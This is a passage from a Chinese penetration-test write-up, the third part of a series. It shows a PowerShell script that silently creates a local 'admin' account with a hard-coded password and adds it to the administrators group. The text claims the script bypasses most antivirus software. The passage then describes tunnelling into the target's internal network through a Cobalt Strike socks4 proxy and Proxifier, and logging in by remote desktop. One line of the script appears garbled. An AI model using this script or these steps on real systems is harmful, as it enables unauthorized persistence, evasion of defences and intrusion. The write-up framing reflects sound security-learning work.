一次授权渗透实战( 三 )


上传添加用户的 ps1 文件到服务器中,调用 powershell 执行,此方法可以绕过大部分杀软,达到免杀加用户到管理员组的目的 。``` *
 
powershell 1.ps1 
```***************
$computer=Get-WMIObject Win32_ComputerSystem$computername = $computer.name$username = 'admin'$password = '1234qwer..'$desc = 'Local admin account'$computer = [ADSI]"WinNT://$computername,computer"$user = $computer.Create("user", $username)$user.SetPassword($password)$user.Setinfo()$user.description = $desc$user.setinfo()$user.UserFlags = 65536$user.SetInfo()$group = ADSI$group.add("WinNT://$username,user")
 
添加用户成功后 。
使用 cs 自带的 socks4 隧道 。

一次授权渗透实战

文章插图
 
本机配置 Proxifer 。
一次授权渗透实战

文章插图
 
成功把本机带入目标内网 。
打开远程桌面功能,输入对方的内网 ip 和远程桌面端口,输入用户名密码 。
登录成功,目标安装了服务器安全狗和企业版金山毒霸,到此渗透结束 。
一次授权渗透实战

文章插图
 
总结 
由于不懂 java 开发,导致前期的 getshell 耽误了过长时间,未解决的问题,后面还需要再学习 。
渗透过程中走了很多弯路,但也学习到了很多新的知识 。
 
原文作者:诺言
转载自:https://www.chainnews.com/articles/863749841296.htm#FBXJjD4U33uwNtZKExSFiw

【一次授权渗透实战】


推荐阅读